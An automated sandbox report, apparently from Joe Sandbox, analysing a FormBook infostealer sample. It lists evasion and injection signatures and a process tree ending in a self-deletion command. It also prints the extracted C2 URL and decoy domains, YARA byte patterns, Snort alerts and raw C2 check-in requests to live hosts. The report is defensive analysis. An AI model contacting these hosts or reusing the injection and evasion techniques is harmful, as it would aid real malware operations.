Loading ...

Play interactive tourEdit tour

Windows Analysis Report pago atrasado.exe

Overview

General Information

Sample Name:pago atrasado.exe
Analysis ID:502137
MD5:f841c72b1c4cadc4c98903ad26a96a16
SHA1:06359aaf42a5ce60889ab7a93d8af7702b34630a
SHA256:eaa038a0020fee7ddfe2919203f20f15ca1d7eb19d90b168cade93b5cf8d7f43
Tags:exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • pago atrasado.exe (PID: 4308 cmdline: 'C:\Users\user\Desktop\pago atrasado.exe' MD5: F841C72B1C4CADC4C98903AD26A96A16)
    • pago atrasado.exe (PID: 2840 cmdline: 'C:\Users\user\Desktop\pago atrasado.exe' MD5: F841C72B1C4CADC4C98903AD26A96A16)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 248 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 4940 cmdline: /c del 'C:\Users\user\Desktop\pago atrasado.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.crisisinterventionadvocates.com/u9xn/"], "decoy": ["lifeguardingcoursenearme.com", "bolsaspapelcdmx.com", "parsleypkllqu.xyz", "68134.online", "shopthatlookboutique.com", "canlibahisportal.com", "oligopoly.city", "srchwithus.online", "151motors.com", "17yue.info", "auntmarysnj.com", "hanansalman.com", "heyunshangcheng.info", "doorslamersplus.com", "sfcn-dng.com", "highvizpeople.com", "seoexpertinbangladesh.com", "christinegagnonjewellery.com", "artifactorie.biz", "mre3.net", "webbyteanalysis.online", "medicmir.store", "shdxh.com", "salvationshippingsecurity.com", "michita.xyz", "itskosi.com", "aligncoachingconsulting.com", "cryptorickclub.art", "cyliamartisbackup.com", "ttemola.com", "mujeresenfarmalatam.com", "mykombuchafactory.com", "irasutoya-ryou.com", "envtmyouliqy.mobi", "expert-rse.com", "oddanimalsink.com", "piezoelectricenergy.com", "itservices-india.com", "wintwiin.com", "umgaleloacademy.com", "everythangbutwhite.com", "ishhs.xyz", "brandsofcannabis.com", "sculptingstones.com", "hilldetailingllc.com", "stone-project.net", "rbrituelbeaute.com", "atzoom.store", "pronogtiki.store", "baybeg.com", "b148tlrfee9evtvorgm5947.com", "msjanej.com", "western-overseas.info", "sharpecommunications.com", "atlantahomesforcarguys.com", "neosudo.com", "blulacedefense.com", "profilecolombia.com", "blacksaltspain.com", "sejiw3.xyz", "saint444.com", "getoken.net", "joycegsy.com", "fezora.xyz"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.1.pago atrasado.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.1.pago atrasado.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.pago atrasado.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
        1.2.pago atrasado.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.pago atrasado.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.crisisinterventionadvocates.com/u9xn/"], "decoy": ["lifeguardingcoursenearme.com", "bolsaspapelcdmx.com", "parsleypkllqu.xyz", "68134.online", "shopthatlookboutique.com", "canlibahisportal.com", "oligopoly.city", "srchwithus.online", "151motors.com", "17yue.info", "auntmarysnj.com", "hanansalman.com", "heyunshangcheng.info", "doorslamersplus.com", "sfcn-dng.com", "highvizpeople.com", "seoexpertinbangladesh.com", "christinegagnonjewellery.com", "artifactorie.biz", "mre3.net", "webbyteanalysis.online", "medicmir.store", "shdxh.com", "salvationshippingsecurity.com", "michita.xyz", "itskosi.com", "aligncoachingconsulting.com", "cryptorickclub.art", "cyliamartisbackup.com", "ttemola.com", "mujeresenfarmalatam.com", "mykombuchafactory.com", "irasutoya-ryou.com", "envtmyouliqy.mobi", "expert-rse.com", "oddanimalsink.com", "piezoelectricenergy.com", "itservices-india.com", "wintwiin.com", "umgaleloacademy.com", "everythangbutwhite.com", "ishhs.xyz", "brandsofcannabis.com", "sculptingstones.com", "hilldetailingllc.com", "stone-project.net", "rbrituelbeaute.com", "atzoom.store", "pronogtiki.store", "baybeg.com", "b148tlrfee9evtvorgm5947.com", "msjanej.com", "western-overseas.info", "sharpecommunications.com", "atlantahomesforcarguys.com", "neosudo.com", "blulacedefense.com", "profilecolombia.com", "blacksaltspain.com", "sejiw3.xyz", "saint444.com", "getoken.net", "joycegsy.com", "fezora.xyz"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: pago atrasado.exeJoe Sandbox ML: detected
          Source: 0.2.pago atrasado.exe.2330000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 16.2.colorcpl.exe.4a4796c.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 16.2.colorcpl.exe.2b2c88.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.pago atrasado.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.pago atrasado.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: pago atrasado.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: colorcpl.pdbGCTL source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
          Source: Binary string: colorcpl.pdb source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: pago atrasado.exe, 00000000.00000003.243423683.000000000F230000.00000004.00000001.sdmp, pago atrasado.exe, 00000001.00000003.248757919.0000000000670000.00000004.00000001.sdmp, colorcpl.exe, 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: pago atrasado.exe, colorcpl.exe
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00402671 FindFirstFileA,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.crisisinterventionadvocates.com
          Source: C:\Windows\explorer.exeDomain query: www.ttemola.com
          Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.27 80
          Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80
          Source: C:\Windows\explorer.exeNetwork Connect: 46.101.121.244 80
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.134 80
          Source: C:\Windows\explorer.exeDomain query: www.baybeg.com
          Source: C:\Windows\explorer.exeDomain query: www.everythangbutwhite.com
          Source: C:\Windows\explorer.exeDomain query: www.highvizpeople.com
          Source: C:\Windows\explorer.exeDomain query: www.itskosi.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.oddanimalsink.com
          Source: C:\Windows\explorer.exeDomain query: www.ishhs.xyz
          Source: C:\Windows\explorer.exeDomain query: www.sfcn-dng.com
          Source: C:\Windows\explorer.exeDomain query: www.umgaleloacademy.com
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.ishhs.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.crisisinterventionadvocates.com/u9xn/
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo HTTP/1.1Host: www.highvizpeople.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo HTTP/1.1Host: www.oddanimalsink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo HTTP/1.1Host: www.itskosi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo HTTP/1.1Host: www.crisisinterventionadvocates.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo HTTP/1.1Host: www.everythangbutwhite.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 208.91.197.27 208.91.197.27
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 14:44:25 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9601-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Wed, 13 Oct 2021 14:44:46 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.otf
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff2
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/27586/searchbtn.png)
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/BG_2.png)
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/Left.png)
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/Right.png)
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
          Source: pago atrasado.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: pago atrasado.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.Highvizpeople.com
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.everythangbutwhite.com
